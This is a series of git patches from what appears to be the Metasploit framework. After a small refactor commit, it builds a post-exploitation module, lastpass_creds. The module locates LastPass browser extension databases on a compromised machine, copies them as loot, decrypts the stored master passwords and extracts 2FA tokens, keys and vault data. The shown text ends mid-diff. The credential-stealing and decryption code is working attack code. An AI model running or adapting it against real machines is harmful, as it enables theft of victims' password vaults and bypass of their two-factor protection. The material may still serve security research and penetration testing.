From d75f55e4937b63b500b51a1d5ce08002cf34f59a Mon Sep 17 00:00:00 2001 From: HD Moore Date: Thu, 26 Feb 2015 11:23:38 -0600 Subject: [PATCH 001/686] Rex should not depend on ActiveSupport, .blank? is not stdlib Ruby --- lib/rex/exploitation/js/memory.rb | 2 +- lib/rex/mime/message.rb | 2 +- lib/rex/parser/fusionvm_nokogiri.rb | 4 ++-- lib/rex/post/meterpreter/client_core.rb | 4 ++-- lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb | 2 +- lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb | 2 +- lib/rex/proto/kademlia/bootstrap_response.rb | 4 ++-- lib/rex/zip/blocks.rb | 2 +- lib/rex/zip/entry.rb | 2 +- 9 files changed, 12 insertions(+), 12 deletions(-) diff --git a/lib/rex/exploitation/js/memory.rb b/lib/rex/exploitation/js/memory.rb index f8fb22c77e..02bf4a3f19 100644 --- a/lib/rex/exploitation/js/memory.rb +++ b/lib/rex/exploitation/js/memory.rb @@ -27,7 +27,7 @@ class Memory def self.heaplib2(custom_js='', opts={}) js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "heaplib2.js")) - unless custom_js.blank? + unless custom_js.to_s.empty? js << custom_js end diff --git a/lib/rex/mime/message.rb b/lib/rex/mime/message.rb index 150a7c081b..01440db0ae 100644 --- a/lib/rex/mime/message.rb +++ b/lib/rex/mime/message.rb @@ -126,7 +126,7 @@ class Message header_string = self.header.to_s msg = header_string.empty? ? '' : force_crlf(self.header.to_s + "\r\n") - msg << force_crlf(self.content + "\r\n") unless self.content.blank? + msg << force_crlf(self.content + "\r\n") unless self.content.to_s.empty? self.parts.each do |part| msg << force_crlf("--" + self.bound + "\r\n") diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb index 8af80d5747..bff2821e18 100644 --- a/lib/rex/parser/fusionvm_nokogiri.rb +++ b/lib/rex/parser/fusionvm_nokogiri.rb @@ -59,7 +59,7 @@ module Parser unless in_tag("JobOrder") case name when "OS" - unless @host.nil? or @text.blank? + unless @host.nil? or @text.to_s.empty? tnote = { :type => "host.os.fusionvm_fingerprint", :data => { :os => @text.strip }, @@ -86,7 +86,7 @@ module Parser when "CVE" @vuln[:refs] << "CVE-#{@text.strip}" when "References" - unless @text.blank? + unless @text.to_s.empty? @text.split(' ').each do |ref| next unless ref.start_with? "http" if ref =~ /MS\d{2}-\d{3}/ diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index ab67096026..6efc911da3 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -219,7 +219,7 @@ class ClientCore < Extension end if client.platform =~ /linux/ - if writable_dir.blank? + if writable_dir.to_s.empty? writable_dir = tmp_folder end @@ -440,7 +440,7 @@ class ClientCore < Extension def tmp_folder tmp = client.sys.config.getenv('TMPDIR') - if tmp.blank? + if tmp.to_s.empty? tmp = '/tmp' end diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb index fde12f624e..58eb7dce4e 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -31,7 +31,7 @@ class Wmi def query(query, root = nil) request = Packet.create_request('extapi_wmi_query') - request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank? + request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.to_s.empty? request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query) response = client.send_request(request) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 31a5c1ef6e..b140c2b0db 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb @@ -69,7 +69,7 @@ class Webcam remote_browser_path = get_webrtc_browser_path - if remote_browser_path.blank? + if remote_browser_path.to_s.empty? raise RuntimeError, "Unable to find a suitable browser on the target machine" end diff --git a/lib/rex/proto/kademlia/bootstrap_response.rb b/lib/rex/proto/kademlia/bootstrap_response.rb index b985ba51a7..71417f3983 100644 --- a/lib/rex/proto/kademlia/bootstrap_response.rb +++ b/lib/rex/proto/kademlia/bootstrap_response.rb @@ -51,14 +51,14 @@ module Kademlia bootstrap_peer_id = Rex::Proto::Kademlia.decode_peer_id(message.body.slice!(0, 16)) bootstrap_tcp_port, bootstrap_version, num_peers = message.body.slice!(0, 5).unpack('vCv') # protocol says there are no peers and the body confirms this, so just return with no peers - if num_peers == 0 && message.body.blank? + if num_peers == 0 && message.body.to_s.empty? peers = [] else peers_data = message.body # peers data is too long/short, abort return if peers_data.size % BOOTSTRAP_PEER_SIZE != 0 peers = [] - until peers_data.blank? + until peers_data.to_s.empty? peer_data = peers_data.slice!(0, BOOTSTRAP_PEER_SIZE) peer_id = Rex::Proto::Kademlia.decode_peer_id(peer_data.slice!(0, 16)) ip, udp_port, tcp_port, version = peer_data.unpack('VvvC') diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb index 3f0da7ecba..4dc2892d5f 100644 --- a/lib/rex/zip/blocks.rb +++ b/lib/rex/zip/blocks.rb @@ -116,7 +116,7 @@ class CentralDir end def pack - if @entry.central_dir_name.blank? + if @entry.central_dir_name.to_s.empty? path = @entry.relative_path else path = @entry.central_dir_path diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb index b1c4a352dc..4e90189126 100644 --- a/lib/rex/zip/entry.rb +++ b/lib/rex/zip/entry.rb @@ -76,7 +76,7 @@ class Entry end def central_dir_path - return nil if @central_dir_name.blank? + return nil if @central_dir_name.to_s.empty? get_relative_path(@central_dir_name) end From 5b0647a1f21e9be2318c5b022b6c6f36526aba49 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Mon, 29 Jun 2015 22:20:38 -0700 Subject: [PATCH 002/686] Add support to steal 2FA token --- modules/post/multi/gather/lastpass_creds.rb | 292 +++++++++++++++----- 1 file changed, 216 insertions(+), 76 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 64e87043fe..65eb675552 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -42,93 +42,40 @@ class Metasploit3 < Msf::Post return end - print_status "Extracting credentials from #{account_map.size} LastPass databases" + lastpass_data = {} #Contains all LastPass info - # an array of [user, encrypted password, browser] - credentials = [] # All credentials to be decrypted - account_map.each_pair do |account, browser_map| - browser_map.each_pair do |browser, paths| - if browser == 'Firefox' - paths.each do |path| - data = read_file(path) - loot_path = store_loot( - 'firefox.preferences', - 'text/javascript', - session, - data, - nil, - "Firefox preferences file #{path}" - ) + print_status "Extracting credentials" + lastpass_data = extract_credentials(account_map) - # Extract usernames and passwords from preference file - firefox_credentials(loot_path).each do |creds| - credentials << [account, browser, URI.unescape(creds[0]), URI.unescape(creds[1])] - end - end - else # Chrome, Safari and Opera - paths.each do |path| - data = read_file(path) - loot_path = store_loot( - "#{browser.downcase}.lastpass.database", - 'application/x-sqlite3', - session, - data, - nil, - "#{account}'s #{browser} LastPass database #{path}" - ) - - # Parsing/Querying the DB - db = SQLite3::Database.new(loot_path) - lastpass_user, lastpass_pass = db.execute( - "SELECT username, password FROM LastPassSavedLogins2 " \ - "WHERE username IS NOT NULL AND username != '' " \ - "AND password IS NOT NULL AND password != '';" - ).flatten - if lastpass_user && lastpass_pass - credentials << [account, browser, lastpass_user, lastpass_pass] + print_status "Extracting 2FA tokens" + localstorage_map = build_localstorage_map + if localstorage_map.empty? + print_status "No LastPass localstorage found" + else + twoFA_token_map = check_localstorage_for_2FA_token(localstorage_map) + lastpass_data.each_pair do |account, browser_map| + browser_map.each_pair do |browser, username_map| + username_map.each_pair do |user, data| + if twoFA_token_map[account][browser] + lastpass_data[account][browser][user] << "defverthbertvwervrfv"#twoFA_token_map[account][browser] + else + lastpass_data[account][browser][user] << "NOT_FOUND" end end end end end - credentials_table = Rex::Ui::Text::Table.new( - 'Header' => "LastPass credentials", - 'Indent' => 1, - 'Columns' => %w(Account Browser LastPass_Username LastPass_Password) - ) - # Parse and decrypt credentials - credentials.each do |row| # Decrypt passwords - account, browser, user, enc_pass = row - vprint_status "Decrypting password for #{account}'s #{user} from #{browser}" - password = clear_text_password(user, enc_pass) - credentials_table << [account, browser, user, password] - end - unless credentials.empty? - print_good credentials_table.to_s - path = store_loot( - "lastpass.creds", - "text/csv", - session, - credentials_table.to_csv, - nil, - "Decrypted LastPass Master Passwords" - ) - end + print_lastpass_data(lastpass_data) end + # Returns a mapping of { Account => { Browser => paths } } def build_account_map platform = session.platform profiles = user_profiles found_dbs_map = {} - if datastore['VERBOSE'] - vprint_status "Found #{profiles.size} users: #{profiles.map { |p| p['UserName'] }.join(', ')}" - else - print_status "Found #{profiles.size} users" - end - profiles.each do |user_profile| account = user_profile['UserName'] browser_path_map = {} @@ -144,7 +91,8 @@ class Metasploit3 < Msf::Post when /unix|linux/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", - 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox" + 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", + 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" } when /osx/ browser_path_map = { @@ -231,7 +179,6 @@ class Metasploit3 < Msf::Post return found_dbs_paths end end - files.each do |file_path| unless %w(. .. Shared).include?(file_path) found_dbs_paths.push([path, file_path].join(sep)) @@ -288,16 +235,18 @@ class Metasploit3 < Msf::Post def clear_text_password(email, encrypted_data) return if encrypted_data.blank? + decrypted_password = "DECRYPTION_ERROR" + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(email) sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin - if encrypted_data.include?("|") # Apply CBC + if encrypted_data.include?("|") # Use CBC decipher = OpenSSL::Cipher.new("AES-256-CBC") decipher.decrypt decipher.key = sha256_binary_email # The key is the emails hashed to SHA256 and converted to binary decipher.iv = Base64.decode64(encrypted_data[1, 24]) # Discard ! and | encrypted_password = encrypted_data[26..-1] - else # Apply ECB + else # Use ECB decipher = OpenSSL::Cipher.new("AES-256-ECB") decipher.decrypt decipher.key = sha256_binary_email @@ -305,9 +254,200 @@ class Metasploit3 < Msf::Post end begin - decipher.update(Base64.decode64(encrypted_password)) + decipher.final + decrypted_password = decipher.update(Base64.decode64(encrypted_password)) + decipher.final rescue print_error "Password for #{email} could not be decrypted" end + + decrypted_password end + + + + + + + + def extract_credentials(account_map) + credentials = account_map # All credentials to be decrypted + + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, paths| + credentials[account][browser] = Hash.new # Get rid of the browser paths + if browser == 'Firefox' + paths.each do |path| + data = read_file(path) + loot_path = store_loot( + 'firefox.preferences', + 'text/javascript', + session, + data, + nil, + "Firefox preferences file #{path}" + ) + + # Extract usernames and passwords from preference file + ffcreds = firefox_credentials(loot_path) + unless ffcreds.blank? + ffcreds.each do |creds| + credentials[account][browser]={URI.unescape(creds[0]) => [URI.unescape(creds[1])]} + end + else + credentials[account].delete("Firefox") + end + + end + else # Chrome, Safari and Opera + paths.each do |path| + data = read_file(path) + loot_path = store_loot( + "#{browser.downcase}.lastpass.database", + 'application/x-sqlite3', + session, + data, + nil, + "#{account}'s #{browser} LastPass database #{path}" + ) + + # Parsing/Querying the DB + db = SQLite3::Database.new(loot_path) + result = db.execute( + "SELECT username, password FROM LastPassSavedLogins2 " \ + "WHERE username IS NOT NULL AND username != '' " \ + ) + + for row in result + if row[0] + row[1].blank? ? row[1] = "NOT_FOUND" : row[1] = clear_text_password(row[0], row[1]) #Decrypt credentials + credentials[account][browser][row[0]] = [row[1]] + end + end + end + end + end + end + + credentials + end + + + # Returns a localstorage mapping of { Account => { Browser => paths } } + def build_localstorage_map + platform = session.platform + profiles = user_profiles + found_localstorage_map = {} + + profiles.each do |user_profile| + account = user_profile['UserName'] + browser_path_map = {} + + case platform + when /win/ + browser_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", + 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" + } + when /unix|linux/ + browser_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + #'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", + 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" + } + when /osx/ + browser_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + #'Firefox' => "#{user_profile['LocalAppData']}\\Firefox\\Profiles", + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", + 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" + } + else + print_error "Platform not recognized: #{platform}" + end + + found_localstorage_map[account] = {} + browser_path_map.each_pair do |browser, path| + found_localstorage_map[account][browser] = path if client.fs.file.exists?(path) + end + end + + found_localstorage_map + end + + + #Extracts the 2FA token from localStorage + def check_localstorage_for_2FA_token(localstorage_map) + localstorage_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, path| + if browser == 'Firefox' + data = read_file(path) + loot_path = store_loot( + 'firefox.preferences', + 'text/javascript', + session, + data, + nil, + "Firefox preferences file #{path}" + ) + + firefox_credentials(loot_path).each do |creds| + credentials << [account, browser, URI.unescape(creds[0]), URI.unescape(creds[1])] + end + else # Chrome, Safari and Opera + data = read_file(path) + loot_path = store_loot( + "#{browser.downcase}.lastpass.localstorage", + 'application/x-sqlite3', + session, + data, + nil, + "#{account}'s #{browser} LastPass localstorage #{path}" + ) + + # Parsing/Querying the DB + db = SQLite3::Database.new(loot_path) + token = db.execute( + "SELECT hex(value) FROM ItemTable " \ + "WHERE key = 'lp.uid';" + ).flatten + token.blank? ? localstorage_map[account][browser] = "NOT_FOUND" : localstorage_map[account][browser] = token.pack('H*') + end + end + end + + localstorage_map + end + + + #Print all extracted LastPass data + def print_lastpass_data(lastpass_data) + lastpass_data_table = Rex::Ui::Text::Table.new( + 'Header' => "LastPass data", + 'Indent' => 1, + 'Columns' => %w(Account Browser LastPass_Username LastPass_Password, LastPass_2FA) + ) + + lastpass_data.each_pair do |account, browser_map| + browser_map.each_pair do |browser, username_map| + username_map.each_pair do |user, data| + lastpass_data_table << [account, browser, user] + data + end + end + end + + unless lastpass_data.empty? + print_good lastpass_data_table.to_s + path = store_loot( + "lastpass.creds", + "text/csv", + session, + lastpass_data_table.to_csv, + nil, + "LastPass Data" + ) + end + + end + end From 0e5e8032ad73370013b27f000dedd6030c51efe8 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Tue, 30 Jun 2015 21:02:10 -0700 Subject: [PATCH 003/686] Add Firefox 2FA support --- modules/post/multi/gather/lastpass_creds.rb | 80 ++++++++++----------- 1 file changed, 40 insertions(+), 40 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 65eb675552..fc01e00cd6 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -49,22 +49,7 @@ class Metasploit3 < Msf::Post print_status "Extracting 2FA tokens" localstorage_map = build_localstorage_map - if localstorage_map.empty? - print_status "No LastPass localstorage found" - else - twoFA_token_map = check_localstorage_for_2FA_token(localstorage_map) - lastpass_data.each_pair do |account, browser_map| - browser_map.each_pair do |browser, username_map| - username_map.each_pair do |user, data| - if twoFA_token_map[account][browser] - lastpass_data[account][browser][user] << "defverthbertvwervrfv"#twoFA_token_map[account][browser] - else - lastpass_data[account][browser][user] << "NOT_FOUND" - end - end - end - end - end + lastpass_data = check_localstorage_for_2FA_token(localstorage_map, lastpass_data) unless localstorage_map.empty? print_lastpass_data(lastpass_data) end @@ -92,12 +77,12 @@ class Metasploit3 < Msf::Post browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", - 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" + 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0" } when /osx/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", - 'Firefox' => "#{user_profile['LocalAppData']}\\Firefox\\Profiles", + 'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", 'Safari' => "#{user_profile['AppData']}/Safari/Databases/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" } @@ -216,12 +201,22 @@ class Metasploit3 < Msf::Post def firefox_credentials(loot_path) credentials = [] File.readlines(loot_path).each do |line| - if /user_pref\("extensions.lastpass.loginpws", "(?.*)"\);/ =~ line + if /user_pref\("extensions.lastpass.loginusers", "(?.*)"\);/ =~ line + usernames = encoded_users.split("|") + usernames.each do |username| + credentials << [username, "NOT_FOUND"] + end + elsif /user_pref\("extensions.lastpass.loginpws", "(?.*)"\);/ =~ line creds_per_user = encoded_creds.split("|") creds_per_user.each do |user_creds| parts = user_creds.split('=') - # Any valid credentials present? - credentials << parts if parts.size > 1 + for creds in credentials # Check if we have the username already + if creds[0] == parts[0] + creds[1] = parts[1] # Add the password to the existing username + else + credentials << parts if parts.size > 1 # Add full credentials + end + end end else next @@ -290,7 +285,7 @@ class Metasploit3 < Msf::Post ffcreds = firefox_credentials(loot_path) unless ffcreds.blank? ffcreds.each do |creds| - credentials[account][browser]={URI.unescape(creds[0]) => [URI.unescape(creds[1])]} + credentials[account][browser][URI.unescape(creds[0])] = [URI.unescape(creds[1])] end else credentials[account].delete("Firefox") @@ -345,20 +340,20 @@ class Metasploit3 < Msf::Post when /win/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", - 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", + 'Firefox' => "#{user_profile['LocalAppData']}\\LastPass", 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" } when /unix|linux/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", - #'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", + 'Firefox' => "#{user_profile['LocalAppData']}/.lastpass", 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" } when /osx/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", - #'Firefox' => "#{user_profile['LocalAppData']}\\Firefox\\Profiles", + 'Firefox' => "#{user_profile['LocalAppData']}/LastPass", 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" } @@ -377,23 +372,25 @@ class Metasploit3 < Msf::Post #Extracts the 2FA token from localStorage - def check_localstorage_for_2FA_token(localstorage_map) + def check_localstorage_for_2FA_token(localstorage_map, lastpass_data) localstorage_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, path| if browser == 'Firefox' - data = read_file(path) - loot_path = store_loot( - 'firefox.preferences', - 'text/javascript', - session, - data, - nil, - "Firefox preferences file #{path}" - ) - - firefox_credentials(loot_path).each do |creds| - credentials << [account, browser, URI.unescape(creds[0]), URI.unescape(creds[1])] + lastpass_data[account][browser].each_pair do |username, data| + path = path + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" + data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + data = "DECRYPTION_ERROR" if (data.blank? || data.size != 32) # Verify content + loot_path = store_loot( + 'firefox.preferences', + 'text/binary', + session, + data, + nil, + "Firefox 2FA token file #{path}" + ) + lastpass_data[account][browser][username] << data end + else # Chrome, Safari and Opera data = read_file(path) loot_path = store_loot( @@ -411,12 +408,15 @@ class Metasploit3 < Msf::Post "SELECT hex(value) FROM ItemTable " \ "WHERE key = 'lp.uid';" ).flatten - token.blank? ? localstorage_map[account][browser] = "NOT_FOUND" : localstorage_map[account][browser] = token.pack('H*') + + lastpass_data[account][browser].each_pair do |username, data| + token.blank? ? lastpass_data[account][browser][username] << "NOT_FOUND" : lastpass_data[account][browser][username] << token.pack('H*') + end end end end - localstorage_map + lastpass_data end From a3365a9c7f8d32b482a80d624182139b64473a4b Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Tue, 28 Jul 2015 00:15:08 -0700 Subject: [PATCH 004/686] Add key, 2fa, iterations and otp support --- modules/post/multi/gather/lastpass_creds.rb | 319 ++++++++++++++------ 1 file changed, 228 insertions(+), 91 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index fc01e00cd6..f0d74e40b0 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -42,28 +42,32 @@ class Metasploit3 < Msf::Post return end - lastpass_data = {} #Contains all LastPass info - print_status "Extracting credentials" - lastpass_data = extract_credentials(account_map) + extract_credentials(account_map) print_status "Extracting 2FA tokens" - localstorage_map = build_localstorage_map - lastpass_data = check_localstorage_for_2FA_token(localstorage_map, lastpass_data) unless localstorage_map.empty? + extract_2fa_tokens(account_map) - print_lastpass_data(lastpass_data) + print_status "Extracting encryption keys" + extract_keys(account_map) + + print_status "Extracting vault and iterations" + extract_vault_and_iterations(account_map) + + print_lastpass_data(account_map) end - # Returns a mapping of { Account => { Browser => paths } } + # Returns a mapping of lastpass accounts def build_account_map platform = session.platform profiles = user_profiles - found_dbs_map = {} + account_map = {} profiles.each do |user_profile| account = user_profile['UserName'] browser_path_map = {} + localstorage_path_map = {} case platform when /win/ @@ -73,12 +77,23 @@ class Metasploit3 < Msf::Post 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" } + localstorage_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 'Firefox' => "#{user_profile['LocalAppData']}\\LastPass", + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", + 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" + } when /unix|linux/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0" } + localstorage_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 'Firefox' => "#{user_profile['LocalAppData']}/.lastpass", + 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" + } when /osx/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", @@ -86,18 +101,30 @@ class Metasploit3 < Msf::Post 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", 'Safari' => "#{user_profile['AppData']}/Safari/Databases/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" } + localstorage_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 'Firefox' => "#{user_profile['LocalAppData']}/LastPass", + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", + 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" + } else print_error "Platform not recognized: #{platform}" end - found_dbs_map[account] = {} + account_map[account] = {} browser_path_map.each_pair do |browser, path| + account_map[account][browser] = {} db_paths = find_db_paths(path, browser, account) - found_dbs_map[account][browser] = db_paths unless db_paths.empty? + if db_paths && db_paths.size > 0 + account_map[account][browser]['lp_db_path'] = db_paths + account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if client.fs.file.exists?(localstorage_path_map[browser]) || browser == 'Firefox' + else + account_map[account].delete(browser) + end end end - found_dbs_map + account_map end # Returns a list of DB paths found in the victims' machine @@ -251,26 +278,18 @@ class Metasploit3 < Msf::Post begin decrypted_password = decipher.update(Base64.decode64(encrypted_password)) + decipher.final rescue - print_error "Password for #{email} could not be decrypted" + vprint_error "Password for #{email} could not be decrypted" end decrypted_password end - - - - - - def extract_credentials(account_map) - credentials = account_map # All credentials to be decrypted - account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, paths| - credentials[account][browser] = Hash.new # Get rid of the browser paths + account_map[account][browser]['lp_creds'] = {} if browser == 'Firefox' - paths.each do |path| + paths['lp_db_path'].each do |path| data = read_file(path) loot_path = store_loot( 'firefox.preferences', @@ -285,6 +304,7 @@ class Metasploit3 < Msf::Post ffcreds = firefox_credentials(loot_path) unless ffcreds.blank? ffcreds.each do |creds| + creds[1].blank? ? creds[1] = "NOT_FOUND" : creds[1] = clear_text_password(URI.unescape(creds[0]), URI.unescape(creds[1])) #Decrypt credentials credentials[account][browser][URI.unescape(creds[0])] = [URI.unescape(creds[1])] end else @@ -293,7 +313,7 @@ class Metasploit3 < Msf::Post end else # Chrome, Safari and Opera - paths.each do |path| + paths['lp_db_path'].each do |path| data = read_file(path) loot_path = store_loot( "#{browser.downcase}.lastpass.database", @@ -303,6 +323,7 @@ class Metasploit3 < Msf::Post nil, "#{account}'s #{browser} LastPass database #{path}" ) + account_map[account][browser]['lp_db_loot'] = loot_path # Parsing/Querying the DB db = SQLite3::Database.new(loot_path) @@ -314,70 +335,23 @@ class Metasploit3 < Msf::Post for row in result if row[0] row[1].blank? ? row[1] = "NOT_FOUND" : row[1] = clear_text_password(row[0], row[1]) #Decrypt credentials - credentials[account][browser][row[0]] = [row[1]] + account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]} end end end end end end - - credentials - end - - - # Returns a localstorage mapping of { Account => { Browser => paths } } - def build_localstorage_map - platform = session.platform - profiles = user_profiles - found_localstorage_map = {} - - profiles.each do |user_profile| - account = user_profile['UserName'] - browser_path_map = {} - - case platform - when /win/ - browser_path_map = { - 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", - 'Firefox' => "#{user_profile['LocalAppData']}\\LastPass", - 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera 